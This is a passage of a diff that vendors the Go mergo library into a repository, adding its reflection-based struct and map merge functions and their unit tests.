+// if src is a map, dst must be a valid pointer to struct. If src is a struct,
+// dst must be map[string]interface{}.
+// It won't merge unexported (private) fields and will do recursively
+// any exported field.
+// If dst is a map, keys will be src fields' names in lower camel case.
+// Missing key in src that doesn't match a field in dst will be skipped. This
+// doesn't apply if dst is a map.
+// This is separated method from Merge because it is cleaner and it keeps sane
+// semantics: merging equal types, mapping different (restricted) types.
+func Map(dst, src interface{}, opts ...func(*Config)) error {
+	return _map(dst, src, opts...)
+}
+
+// MapWithOverwrite will do the same as Map except that non-empty dst attributes will be overridden by
+// non-empty src attribute values.
+// Deprecated: Use Map(…) with WithOverride
+func MapWithOverwrite(dst, src interface{}, opts ...func(*Config)) error {
+	return _map(dst, src, append(opts, WithOverride)...)
+}
+
+func _map(dst, src interface{}, opts ...func(*Config)) error {
+	var (
+		vDst, vSrc reflect.Value
+		err        error
+	)
+	config := &Config{}
+
+	for _, opt := range opts {
+		opt(config)
+	}
+
+	if vDst, vSrc, err = resolveValues(dst, src); err != nil {
+		return err
+	}
+	// To be friction-less, we redirect equal-type arguments
+	// to deepMerge. Only because arguments can be anything.
+	if vSrc.Kind() == vDst.Kind() {
+		return deepMerge(vDst, vSrc, make(map[uintptr]*visit), 0, config)
+	}
+	switch vSrc.Kind() {
+	case reflect.Struct:
+		if vDst.Kind() != reflect.Map {
+			return ErrExpectedMapAsDestination
+		}
+	case reflect.Map:
+		if vDst.Kind() != reflect.Struct {
+			return ErrExpectedStructAsDestination
+		}
+	default:
+		return ErrNotSupported
+	}
+	return deepMap(vDst, vSrc, make(map[uintptr]*visit), 0, config)
+}
diff --git a/vendor/github.com/imdario/mergo/merge.go b/vendor/github.com/imdario/mergo/merge.go
new file mode 100644
index 0000000000..706b22069c
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/merge.go
@@ -0,0 +1,245 @@
+// Copyright 2013 Dario Castañé. All rights reserved.
+// Copyright 2009 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// Based on src/pkg/reflect/deepequal.go from official
+// golang's stdlib.
+
+package mergo
+
+import (
+	"reflect"
+)
+
+func hasExportedField(dst reflect.Value) (exported bool) {
+	for i, n := 0, dst.NumField(); i < n; i++ {
+		field := dst.Type().Field(i)
+		if field.Anonymous && dst.Field(i).Kind() == reflect.Struct {
+			exported = exported || hasExportedField(dst.Field(i))
+		} else {
+			exported = exported || len(field.PkgPath) == 0
+		}
+	}
+	return
+}
+
+type Config struct {
+	Overwrite    bool
+	AppendSlice  bool
+	Transformers Transformers
+}
+
+type Transformers interface {
+	Transformer(reflect.Type) func(dst, src reflect.Value) error
+}
+
+// Traverses recursively both values, assigning src's fields values to dst.
+// The map argument tracks comparisons that have already been seen, which allows
+// short circuiting on recursive types.
+func deepMerge(dst, src reflect.Value, visited map[uintptr]*visit, depth int, config *Config) (err error) {
+	overwrite := config.Overwrite
+
+	if !src.IsValid() {
+		return
+	}
+	if dst.CanAddr() {
+		addr := dst.UnsafeAddr()
+		h := 17 * addr
+		seen := visited[h]
+		typ := dst.Type()
+		for p := seen; p != nil; p = p.next {
+			if p.ptr == addr && p.typ == typ {
+				return nil
+			}
+		}
+		// Remember, remember...
+		visited[h] = &visit{addr, typ, seen}
+	}
+
+	if config.Transformers != nil && !isEmptyValue(dst) {
+		if fn := config.Transformers.Transformer(dst.Type()); fn != nil {
+			err = fn(dst, src)
+			return
+		}
+	}
+
+	switch dst.Kind() {
+	case reflect.Struct:
+		if hasExportedField(dst) {
+			for i, n := 0, dst.NumField(); i < n; i++ {
+				if err = deepMerge(dst.Field(i), src.Field(i), visited, depth+1, config); err != nil {
+					return
+				}
+			}
+		} else {
+			if dst.CanSet() && !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) {
+				dst.Set(src)
+			}
+		}
+	case reflect.Map:
+		if dst.IsNil() && !src.IsNil() {
+			dst.Set(reflect.MakeMap(dst.Type()))
+		}
+		for _, key := range src.MapKeys() {
+			srcElement := src.MapIndex(key)
+			if !srcElement.IsValid() {
+				continue
+			}
+			dstElement := dst.MapIndex(key)
+			switch srcElement.Kind() {
+			case reflect.Chan, reflect.Func, reflect.Map, reflect.Interface, reflect.Slice:
+				if srcElement.IsNil() {
+					continue
+				}
+				fallthrough
+			default:
+				if !srcElement.CanInterface() {
+					continue
+				}
+				switch reflect.TypeOf(srcElement.Interface()).Kind() {
+				case reflect.Struct:
+					fallthrough
+				case reflect.Ptr:
+					fallthrough
+				case reflect.Map:
+					srcMapElm := srcElement
+					dstMapElm := dstElement
+					if srcMapElm.CanInterface() {
+						srcMapElm = reflect.ValueOf(srcMapElm.Interface())
+						if dstMapElm.IsValid() {
+							dstMapElm = reflect.ValueOf(dstMapElm.Interface())
+						}
+					}
+					if err = deepMerge(dstMapElm, srcMapElm, visited, depth+1, config); err != nil {
+						return
+					}
+				case reflect.Slice:
+					srcSlice := reflect.ValueOf(srcElement.Interface())
+
+					var dstSlice reflect.Value
+					if !dstElement.IsValid() || dstElement.IsNil() {
+						dstSlice = reflect.MakeSlice(srcSlice.Type(), 0, srcSlice.Len())
+					} else {
+						dstSlice = reflect.ValueOf(dstElement.Interface())
+					}
+
+					if !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) && !config.AppendSlice {
+						dstSlice = srcSlice
+					} else if config.AppendSlice {
+						dstSlice = reflect.AppendSlice(dstSlice, srcSlice)
+					}
+					dst.SetMapIndex(key, dstSlice)
+				}
+			}
+			if dstElement.IsValid() && reflect.TypeOf(srcElement.Interface()).Kind() == reflect.Map {
+				continue
+			}
+
+			if srcElement.IsValid() && (overwrite || (!dstElement.IsValid() || isEmptyValue(dstElement))) {
+				if dst.IsNil() {
+					dst.Set(reflect.MakeMap(dst.Type()))
+				}
+				dst.SetMapIndex(key, srcElement)
+			}
+		}
+	case reflect.Slice:
+		if !dst.CanSet() {
+			break
+		}
+		if !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) && !config.AppendSlice {
+			dst.Set(src)
+		} else if config.AppendSlice {
+			dst.Set(reflect.AppendSlice(dst, src))
+		}
+	case reflect.Ptr:
+		fallthrough
+	case reflect.Interface:
+		if src.IsNil() {
+			break
+		}
+		if src.Kind() != reflect.Interface {
+			if dst.IsNil() || overwrite {
+				if dst.CanSet() && (overwrite || isEmptyValue(dst)) {
+					dst.Set(src)
+				}
+			} else if src.Kind() == reflect.Ptr {
+				if err = deepMerge(dst.Elem(), src.Elem(), visited, depth+1, config); err != nil {
+					return
+				}
+			} else if dst.Elem().Type() == src.Type() {
+				if err = deepMerge(dst.Elem(), src, visited, depth+1, config); err != nil {
+					return
+				}
+			} else {
+				return ErrDifferentArgumentsTypes
+			}
+			break
+		}
+		if dst.IsNil() || overwrite {
+			if dst.CanSet() && (overwrite || isEmptyValue(dst)) {
+				dst.Set(src)
+			}
+		} else if err = deepMerge(dst.Elem(), src.Elem(), visited, depth+1, config); err != nil {
+			return
+		}
+	default:
+		if dst.CanSet() && !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) {
+			dst.Set(src)
+		}
+	}
+	return
+}
+
+// Merge will fill any empty for value type attributes on the dst struct using corresponding
+// src attributes if they themselves are not empty. dst and src must be valid same-type structs
+// and dst must be a pointer to struct.
+// It won't merge unexported (private) fields and will do recursively any exported field.
+func Merge(dst, src interface{}, opts ...func(*Config)) error {
+	return merge(dst, src, opts...)
+}
+
+// MergeWithOverwrite will do the same as Merge except that non-empty dst attributes will be overriden by
+// non-empty src attribute values.
+// Deprecated: use Merge(…) with WithOverride
+func MergeWithOverwrite(dst, src interface{}, opts ...func(*Config)) error {
+	return merge(dst, src, append(opts, WithOverride)...)
+}
+
+// WithTransformers adds transformers to merge, allowing to customize the merging of some types.
+func WithTransformers(transformers Transformers) func(*Config) {
+	return func(config *Config) {
+		config.Transformers = transformers
+	}
+}
+
+// WithOverride will make merge override non-empty dst attributes with non-empty src attributes values.
+func WithOverride(config *Config) {
+	config.Overwrite = true
+}
+
+// WithAppendSlice will make merge append slices instead of overwriting it
+func WithAppendSlice(config *Config) {
+	config.AppendSlice = true
+}
+
+func merge(dst, src interface{}, opts ...func(*Config)) error {
+	var (
+		vDst, vSrc reflect.Value
+		err        error
+	)
+
+	config := &Config{}
+
+	for _, opt := range opts {
+		opt(config)
+	}
+
+	if vDst, vSrc, err = resolveValues(dst, src); err != nil {
+		return err
+	}
+	if vDst.Type() != vSrc.Type() {
+		return ErrDifferentArgumentsTypes
+	}
+	return deepMerge(vDst, vSrc, make(map[uintptr]*visit), 0, config)
+}
diff --git a/vendor/github.com/imdario/mergo/merge_appendslice_test.go b/vendor/github.com/imdario/mergo/merge_appendslice_test.go
new file mode 100644
index 0000000000..a780f34a3c
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/merge_appendslice_test.go
@@ -0,0 +1,33 @@
+package mergo
+
+import (
+	"testing"
+)
+
+var testDataS = []struct {
+	S1            Student
+	S2            Student
+	ExpectedSlice []string
+}{
+	{Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{"1"}}, []string{"1", "a", "B"}},
+	{Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{}}, []string{"a", "B"}},
+	{Student{"Jack", []string{}}, Student{"Tom", []string{"1"}}, []string{"1"}},
+	{Student{"Jack", []string{}}, Student{"Tom", []string{}}, []string{}},
+}
+
+func TestMergeSliceWithOverrideWithAppendSlice(t *testing.T) {
+	for _, data := range testDataS {
+		err := Merge(&data.S2, data.S1, WithOverride, WithAppendSlice)
+		if err != nil {
+			t.Errorf("Error while merging %s", err)
+		}
+		if len(data.S2.Books) != len(data.ExpectedSlice) {
+			t.Fatalf("Got %d elements in slice, but expected %d", len(data.S2.Books), len(data.ExpectedSlice))
+		}
+		for i, val := range data.S2.Books {
+			if val != data.ExpectedSlice[i] {
+				t.Fatalf("Expected %s, but got %s while merging slice with override", data.ExpectedSlice[i], val)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/merge_test.go b/vendor/github.com/imdario/mergo/merge_test.go
new file mode 100644
index 0000000000..5bf808a786
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/merge_test.go
@@ -0,0 +1,50 @@
+package mergo
+
+import (
+	"reflect"
+	"testing"
+)
+
+type transformer struct {
+	m map[reflect.Type]func(dst, src reflect.Value) error
+}
+
+func (s *transformer) Transformer(t reflect.Type) func(dst, src reflect.Value) error {
+	if fn, ok := s.m[t]; ok {
+		return fn
+	}
+	return nil
+}
+
+type foo struct {
+	s   string
+	Bar *bar
+}
+
+type bar struct {
+	i int
+	s map[string]string
+}
+
+func TestMergeWithTransformerNilStruct(t *testing.T) {
+	a := foo{s: "foo"}
+	b := foo{Bar: &bar{i: 2, s: map[string]string{"foo": "bar"}}}
+	if err := Merge(&a, &b, WithOverride, WithTransformers(&transformer{
+		m: map[reflect.Type]func(dst, src reflect.Value) error{
+			reflect.TypeOf(&bar{}): func(dst, src reflect.Value) error {
+				// Do sthg with Elem
+				t.Log(dst.Elem().FieldByName("i"))
+				t.Log(src.Elem())
+				return nil
+			},
+		},
+	})); err != nil {
+		t.Fatal(err)
+	}
+	if a.s != "foo" {
+		t.Fatalf("b not merged in properly: a.s.Value(%s) != expected(%s)", a.s, "foo")
+	}
+	if a.Bar == nil {
+		t.Fatalf("b not merged in properly: a.Bar shouldn't be nil")
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/mergo.go b/vendor/github.com/imdario/mergo/mergo.go
new file mode 100644
index 0000000000..a82fea2fdc
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/mergo.go
@@ -0,0 +1,97 @@
+// Copyright 2013 Dario Castañé. All rights reserved.
+// Copyright 2009 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// Based on src/pkg/reflect/deepequal.go from official
+// golang's stdlib.
+
+package mergo
+
+import (
+	"errors"
+	"reflect"
+)
+
+// Errors reported by Mergo when it finds invalid arguments.
+var (
+	ErrNilArguments                = errors.New("src and dst must not be nil")
+	ErrDifferentArgumentsTypes     = errors.New("src and dst must be of same type")
+	ErrNotSupported                = errors.New("only structs and maps are supported")
+	ErrExpectedMapAsDestination    = errors.New("dst was expected to be a map")
+	ErrExpectedStructAsDestination = errors.New("dst was expected to be a struct")
+)
+
+// During deepMerge, must keep track of checks that are
+// in progress.  The comparison algorithm assumes that all
+// checks in progress are true when it reencounters them.
+// Visited are stored in a map indexed by 17 * a1 + a2;
+type visit struct {
+	ptr  uintptr
+	typ  reflect.Type
+	next *visit
+}
+
+// From src/pkg/encoding/json/encode.go.
+func isEmptyValue(v reflect.Value) bool {
+	switch v.Kind() {
+	case reflect.Array, reflect.Map, reflect.Slice, reflect.String:
+		return v.Len() == 0
+	case reflect.Bool:
+		return !v.Bool()
+	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+		return v.Int() == 0
+	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+		return v.Uint() == 0
+	case reflect.Float32, reflect.Float64:
+		return v.Float() == 0
+	case reflect.Interface, reflect.Ptr:
+		if v.IsNil() {
+			return true
+		}
+		return isEmptyValue(v.Elem())
+	case reflect.Func:
+		return v.IsNil()
+	case reflect.Invalid:
+		return true
+	}
+	return false
+}
+
+func resolveValues(dst, src interface{}) (vDst, vSrc reflect.Value, err error) {
+	if dst == nil || src == nil {
+		err = ErrNilArguments
+		return
+	}
+	vDst = reflect.ValueOf(dst).Elem()
+	if vDst.Kind() != reflect.Struct && vDst.Kind() != reflect.Map {
+		err = ErrNotSupported
+		return
+	}
+	vSrc = reflect.ValueOf(src)
+	// We check if vSrc is a pointer to dereference it.
+	if vSrc.Kind() == reflect.Ptr {
+		vSrc = vSrc.Elem()
+	}
+	return
+}
+
+// Traverses recursively both values, assigning src's fields values to dst.
+// The map argument tracks comparisons that have already been seen, which allows
+// short circuiting on recursive types.
+func deeper(dst, src reflect.Value, visited map[uintptr]*visit, depth int) (err error) {
+	if dst.CanAddr() {
+		addr := dst.UnsafeAddr()
+		h := 17 * addr
+		seen := visited[h]
+		typ := dst.Type()
+		for p := seen; p != nil; p = p.next {
+			if p.ptr == addr && p.typ == typ {
+				return nil
+			}
+		}
+		// Remember, remember...
+		visited[h] = &visit{addr, typ, seen}
+	}
+	return // TODO refactor
+}
diff --git a/vendor/github.com/imdario/mergo/mergo_test.go b/vendor/github.com/imdario/mergo/mergo_test.go
new file mode 100644
index 0000000000..d777538431
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/mergo_test.go
@@ -0,0 +1,733 @@
+// Copyright 2013 Dario Castañé. All rights reserved.
+// Copyright 2009 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package mergo
+
+import (
+	"io/ioutil"
+	"reflect"
+	"testing"
+	"time"
+
+	"gopkg.in/yaml.v2"
+)
+
+type simpleTest struct {
+	Value int
+}
+
+type complexTest struct {
+	St simpleTest
+	sz int
+	ID string
+}
+
+type mapTest struct {
+	M map[int]int
+}
+
+type ifcTest struct {
+	I interface{}
+}
+
+type moreComplextText struct {
+	Ct complexTest
+	St simpleTest
+	Nt simpleTest
+}
+
+type pointerTest struct {
+	C *simpleTest
+}
+
+type sliceTest struct {
+	S []int
+}
+
+func TestKb(t *testing.T) {
+	type testStruct struct {
+		Name     string
+		KeyValue map[string]interface{}
+	}
+
+	akv := make(map[string]interface{})
+	akv["Key1"] = "not value 1"
+	akv["Key2"] = "value2"
+	a := testStruct{}
+	a.Name = "A"
+	a.KeyValue = akv
+
+	bkv := make(map[string]interface{})
+	bkv["Key1"] = "value1"
+	bkv["Key3"] = "value3"
+	b := testStruct{}
+	b.Name = "B"
+	b.KeyValue = bkv
+
+	ekv := make(map[string]interface{})
+	ekv["Key1"] = "value1"
+	ekv["Key2"] = "value2"
+	ekv["Key3"] = "value3"
+	expected := testStruct{}
+	expected.Name = "B"
+	expected.KeyValue = ekv
+
+	Merge(&b, a)
+
+	if !reflect.DeepEqual(b, expected) {
+		t.Errorf("Actual: %#v did not match \nExpected: %#v", b, expected)
+	}
+}
+
+func TestNil(t *testing.T) {
+	if err := Merge(nil, nil); err != ErrNilArguments {
+		t.Fail()
+	}
+}
+
+func TestDifferentTypes(t *testing.T) {
+	a := simpleTest{42}
+	b := 42
+	if err := Merge(&a, b); err != ErrDifferentArgumentsTypes {
+		t.Fail()
+	}
+}
+
+func TestSimpleStruct(t *testing.T) {
+	a := simpleTest{}
+	b := simpleTest{42}
+	if err := Merge(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.Value != 42 {
+		t.Fatalf("b not merged in properly: a.Value(%d) != b.Value(%d)", a.Value, b.Value)
+	}
+	if !reflect.DeepEqual(a, b) {
+		t.FailNow()
+	}
+}
+
+func TestComplexStruct(t *testing.T) {
+	a := complexTest{}
+	a.ID = "athing"
+	b := complexTest{simpleTest{42}, 1, "bthing"}
+	if err := Merge(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.St.Value != 42 {
+		t.Fatalf("b not merged in properly: a.St.Value(%d) != b.St.Value(%d)", a.St.Value, b.St.Value)
+	}
+	if a.sz == 1 {
+		t.Fatalf("a's private field sz not preserved from merge: a.sz(%d) == b.sz(%d)", a.sz, b.sz)
+	}
+	if a.ID == b.ID {
+		t.Fatalf("a's field ID merged unexpectedly: a.ID(%s) == b.ID(%s)", a.ID, b.ID)
+	}
+}
+
+func TestComplexStructWithOverwrite(t *testing.T) {
+	a := complexTest{simpleTest{1}, 1, "do-not-overwrite-with-empty-value"}
+	b := complexTest{simpleTest{42}, 2, ""}
+
+	expect := complexTest{simpleTest{42}, 1, "do-not-overwrite-with-empty-value"}
+	if err := MergeWithOverwrite(&a, b); err != nil {
+		t.FailNow()
+	}
+
+	if !reflect.DeepEqual(a, expect) {
+		t.Fatalf("Test failed:\ngot  :\n%#v\n\nwant :\n%#v\n\n", a, expect)
+	}
+}
+
+func TestPointerStruct(t *testing.T) {
+	s1 := simpleTest{}
+	s2 := simpleTest{19}
+	a := pointerTest{&s1}
+	b := pointerTest{&s2}
+	if err := Merge(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.C.Value != b.C.Value {
+		t.Fatalf("b not merged in properly: a.C.Value(%d) != b.C.Value(%d)", a.C.Value, b.C.Value)
+	}
+}
+
+type embeddingStruct struct {
+	embeddedStruct
+}
+
+type embeddedStruct struct {
+	A string
+}
+
+func TestEmbeddedStruct(t *testing.T) {
+	tests := []struct {
+		src      embeddingStruct
+		dst      embeddingStruct
+		expected embeddingStruct
+	}{
+		{
+			src: embeddingStruct{
+				embeddedStruct{"foo"},
+			},
+			dst: embeddingStruct{
+				embeddedStruct{""},
+			},
+			expected: embeddingStruct{
+				embeddedStruct{"foo"},
+			},
+		},
+		{
+			src: embeddingStruct{
+				embeddedStruct{""},
+			},
+			dst: embeddingStruct{
+				embeddedStruct{"bar"},
+			},
+			expected: embeddingStruct{
+				embeddedStruct{"bar"},
+			},
+		},
+		{
+			src: embeddingStruct{
+				embeddedStruct{"foo"},
+			},
+			dst: embeddingStruct{
+				embeddedStruct{"bar"},
+			},
+			expected: embeddingStruct{
+				embeddedStruct{"bar"},
+			},
+		},
+	}
+
+	for _, test := range tests {
+		err := Merge(&test.dst, test.src)
+		if err != nil {
+			t.Errorf("unexpected error: %v", err)
+			continue
+		}
+		if !reflect.DeepEqual(test.dst, test.expected) {
+			t.Errorf("unexpected output\nexpected:\n%+v\nsaw:\n%+v\n", test.expected, test.dst)
+		}
+	}
+}
+
+func TestPointerStructNil(t *testing.T) {
+	a := pointerTest{nil}
+	b := pointerTest{&simpleTest{19}}
+	if err := Merge(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.C.Value != b.C.Value {
+		t.Fatalf("b not merged in a properly: a.C.Value(%d) != b.C.Value(%d)", a.C.Value, b.C.Value)
+	}
+}
+
+func testSlice(t *testing.T, a []int, b []int, e []int, opts ...func(*Config)) {
+	t.Helper()
+	bc := b
+
+	sa := sliceTest{a}
+	sb := sliceTest{b}
+	if err := Merge(&sa, sb, opts...); err != nil {
+		t.FailNow()
+	}
+	if !reflect.DeepEqual(sb.S, bc) {
+		t.Fatalf("Source slice was modified %d != %d", sb.S, bc)
+	}
+	if !reflect.DeepEqual(sa.S, e) {
+		t.Fatalf("b not merged in a proper way %d != %d", sa.S, e)
+	}
+
+	ma := map[string][]int{"S": a}
+	mb := map[string][]int{"S": b}
+	if err := Merge(&ma, mb, opts...); err != nil {
+		t.FailNow()
+	}
+	if !reflect.DeepEqual(mb["S"], bc) {
+		t.Fatalf("map value: Source slice was modified %d != %d", mb["S"], bc)
+	}
+	if !reflect.DeepEqual(ma["S"], e) {
+		t.Fatalf("map value: b not merged in a proper way %d != %d", ma["S"], e)
+	}
+
+	if a == nil {
+		// test case with missing dst key
+		ma := map[string][]int{}
+		mb := map[string][]int{"S": b}
+		if err := Merge(&ma, mb); err != nil {
+			t.FailNow()
+		}
+		if !reflect.DeepEqual(mb["S"], bc) {
+			t.Fatalf("missing dst key: Source slice was modified %d != %d", mb["S"], bc)
+		}
+		if !reflect.DeepEqual(ma["S"], e) {
+			t.Fatalf("missing dst key: b not merged in a proper way %d != %d", ma["S"], e)
+		}
+	}
+
+	if b == nil {
+		// test case with missing src key
+		ma := map[string][]int{"S": a}
+		mb := map[string][]int{}
+		if err := Merge(&ma, mb); err != nil {
+			t.FailNow()
+		}
+		if !reflect.DeepEqual(mb["S"], bc) {
+			t.Fatalf("missing src key: Source slice was modified %d != %d", mb["S"], bc)
+		}
+		if !reflect.DeepEqual(ma["S"], e) {
+			t.Fatalf("missing src key: b not merged in a proper way %d != %d", ma["S"], e)
+		}
+	}
+}
+
+func TestSlice(t *testing.T) {
+	testSlice(t, nil, []int{1, 2, 3}, []int{1, 2, 3})
+	testSlice(t, []int{}, []int{1, 2, 3}, []int{1, 2, 3})
+	testSlice(t, []int{1}, []int{2, 3}, []int{1})
+	testSlice(t, []int{1}, []int{}, []int{1})
+	testSlice(t, []int{1}, nil, []int{1})
+	testSlice(t, nil, []int{1, 2, 3}, []int{1, 2, 3}, WithAppendSlice)
+	testSlice(t, []int{}, []int{1, 2, 3}, []int{1, 2, 3}, WithAppendSlice)
+	testSlice(t, []int{1}, []int{2, 3}, []int{1, 2, 3}, WithAppendSlice)
+	testSlice(t, []int{1}, []int{}, []int{1}, WithAppendSlice)
+	testSlice(t, []int{1}, nil, []int{1}, WithAppendSlice)
+}
+
+func TestEmptyMaps(t *testing.T) {
+	a := mapTest{}
+	b := mapTest{
+		map[int]int{},
+	}
+	if err := Merge(&a, b); err != nil {
+		t.Fail()
+	}
+	if !reflect.DeepEqual(a, b) {
+		t.FailNow()
+	}
+}
+
+func TestEmptyToEmptyMaps(t *testing.T) {
+	a := mapTest{}
+	b := mapTest{}
+	if err := Merge(&a, b); err != nil {
+		t.Fail()
+	}
+	if !reflect.DeepEqual(a, b) {
+		t.FailNow()
+	}
+}
+
+func TestEmptyToNotEmptyMaps(t *testing.T) {
+	a := mapTest{map[int]int{
+		1: 2,
+		3: 4,
+	}}
+	aa := mapTest{map[int]int{
+		1: 2,
+		3: 4,
+	}}
+	b := mapTest{
+		map[int]int{},
+	}
+	if err := Merge(&a, b); err != nil {
+		t.Fail()
+	}
+	if !reflect.DeepEqual(a, aa) {
+		t.FailNow()
+	}
+}
+
+func TestMapsWithOverwrite(t *testing.T) {
+	m := map[string]simpleTest{
+		"a": {},   // overwritten by 16
+		"b": {42}, // not overwritten by empty value
+		"c": {13}, // overwritten by 12
+		"d": {61},
+	}
+	n := map[string]simpleTest{
+		"a": {16},
+		"b": {},
+		"c": {12},
+		"e": {14},
+	}
+	expect := map[string]simpleTest{
+		"a": {16},
+		"b": {},
+		"c": {12},
+		"d": {61},
+		"e": {14},
+	}
+
+	if err := MergeWithOverwrite(&m, n); err != nil {
+		t.Fatalf(err.Error())
+	}
+
+	if !reflect.DeepEqual(m, expect) {
+		t.Fatalf("Test failed:\ngot  :\n%#v\n\nwant :\n%#v\n\n", m, expect)
+	}
+}
+
+func TestMaps(t *testing.T) {
+	m := map[string]simpleTest{
+		"a": {},
+		"b": {42},
+		"c": {13},
+		"d": {61},
+	}
+	n := map[string]simpleTest{
+		"a": {16},
+		"b": {},
+		"c": {12},
+		"e": {14},
+	}
+	expect := map[string]simpleTest{
+		"a": {0},
+		"b": {42},
+		"c": {13},
+		"d": {61},
+		"e": {14},
+	}
+
+	if err := Merge(&m, n); err != nil {
+		t.Fatalf(err.Error())
+	}
+
+	if !reflect.DeepEqual(m, expect) {
+		t.Fatalf("Test failed:\ngot  :\n%#v\n\nwant :\n%#v\n\n", m, expect)
+	}
+	if m["a"].Value != 0 {
+		t.Fatalf(`n merged in m because I solved non-addressable map values TODO: m["a"].Value(%d) != n["a"].Value(%d)`, m["a"].Value, n["a"].Value)
+	}
+	if m["b"].Value != 42 {
+		t.Fatalf(`n wrongly merged in m: m["b"].Value(%d) != n["b"].Value(%d)`, m["b"].Value, n["b"].Value)
+	}
+	if m["c"].Value != 13 {
+		t.Fatalf(`n overwritten in m: m["c"].Value(%d) != n["c"].Value(%d)`, m["c"].Value, n["c"].Value)
+	}
+}
+
+func TestMapsWithNilPointer(t *testing.T) {
+	m := map[string]*simpleTest{
+		"a": nil,
+		"b": nil,
+	}
+	n := map[string]*simpleTest{
+		"b": nil,
+		"c": nil,
+	}
+	expect := map[string]*simpleTest{
+		"a": nil,
+		"b": nil,
+		"c": nil,
+	}
+
+	if err := Merge(&m, n, WithOverride); err != nil {
+		t.Fatalf(err.Error())
+	}
+
+	if !reflect.DeepEqual(m, expect) {
+		t.Fatalf("Test failed:\ngot   :\n%#v\n\nwant :\n%#v\n\n", m, expect)
+	}
+}
+
+func TestYAMLMaps(t *testing.T) {
+	thing := loadYAML("testdata/thing.yml")
+	license := loadYAML("testdata/license.yml")
+	ft := thing["fields"].(map[interface{}]interface{})
+	fl := license["fields"].(map[interface{}]interface{})
+	// license has one extra field (site) and another already existing in thing (author) that Mergo won't override.
+	expectedLength := len(ft) + len(fl) - 1
+	if err := Merge(&license, thing); err != nil {
+		t.Fatal(err.Error())
+	}
+	currentLength := len(license["fields"].(map[interface{}]interface{}))
+	if currentLength != expectedLength {
+		t.Fatalf(`thing not merged in license properly, license must have %d elements instead of %d`, expectedLength, currentLength)
+	}
+	fields := license["fields"].(map[interface{}]interface{})
+	if _, ok := fields["id"]; !ok {
+		t.Fatalf(`thing not merged in license properly, license must have a new id field from thing`)
+	}
+}
+
+func TestTwoPointerValues(t *testing.T) {
+	a := &simpleTest{}
+	b := &simpleTest{42}
+	if err := Merge(a, b); err != nil {
+		t.Fatalf(`Boom. You crossed the streams: %s`, err)
+	}
+}
+
+func TestMap(t *testing.T) {
+	a := complexTest{}
+	a.ID = "athing"
+	c := moreComplextText{a, simpleTest{}, simpleTest{}}
+	b := map[string]interface{}{
+		"ct": map[string]interface{}{
+			"st": map[string]interface{}{
+				"value": 42,
+			},
+			"sz": 1,
+			"id": "bthing",
+		},
+		"st": &simpleTest{144}, // Mapping a reference
+		"zt": simpleTest{299},  // Mapping a missing field (zt doesn't exist)
+		"nt": simpleTest{3},
+	}
+	if err := Map(&c, b); err != nil {
+		t.FailNow()
+	}
+	m := b["ct"].(map[string]interface{})
+	n := m["st"].(map[string]interface{})
+	o := b["st"].(*simpleTest)
+	p := b["nt"].(simpleTest)
+	if c.Ct.St.Value != 42 {
+		t.Fatalf("b not merged in properly: c.Ct.St.Value(%d) != b.Ct.St.Value(%d)", c.Ct.St.Value, n["value"])
+	}
+	if c.St.Value != 144 {
+		t.Fatalf("b not merged in properly: c.St.Value(%d) != b.St.Value(%d)", c.St.Value, o.Value)
+	}
+	if c.Nt.Value != 3 {
+		t.Fatalf("b not merged in properly: c.Nt.Value(%d) != b.Nt.Value(%d)", c.St.Value, p.Value)
+	}
+	if c.Ct.sz == 1 {
+		t.Fatalf("a's private field sz not preserved from merge: c.Ct.sz(%d) == b.Ct.sz(%d)", c.Ct.sz, m["sz"])
+	}
+	if c.Ct.ID == m["id"] {
+		t.Fatalf("a's field ID merged unexpectedly: c.Ct.ID(%s) == b.Ct.ID(%s)", c.Ct.ID, m["id"])
+	}
+}
+
+func TestSimpleMap(t *testing.T) {
+	a := simpleTest{}
+	b := map[string]interface{}{
+		"value": 42,
+	}
+	if err := Map(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.Value != 42 {
+		t.Fatalf("b not merged in properly: a.Value(%d) != b.Value(%v)", a.Value, b["value"])
+	}
+}
+
+func TestIfcMap(t *testing.T) {
+	a := ifcTest{}
+	b := ifcTest{42}
+	if err := Map(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.I != 42 {
+		t.Fatalf("b not merged in properly: a.I(%d) != b.I(%d)", a.I, b.I)
+	}
+	if !reflect.DeepEqual(a, b) {
+		t.FailNow()
+	}
+}
+
+func TestIfcMapNoOverwrite(t *testing.T) {
+	a := ifcTest{13}
+	b := ifcTest{42}
+	if err := Map(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.I != 13 {
+		t.Fatalf("a not left alone: a.I(%d) == b.I(%d)", a.I, b.I)
+	}
+}
+
+func TestIfcMapWithOverwrite(t *testing.T) {
+	a := ifcTest{13}
+	b := ifcTest{42}
+	if err := MapWithOverwrite(&a, b); err != nil {
+		t.FailNow()
+	}
+	if a.I != 42 {
+		t.Fatalf("b not merged in properly: a.I(%d) != b.I(%d)", a.I, b.I)
+	}
+	if !reflect.DeepEqual(a, b) {
+		t.FailNow()
+	}
+}
+
+type pointerMapTest struct {
+	A      int
+	hidden int
+	B      *simpleTest
+}
+
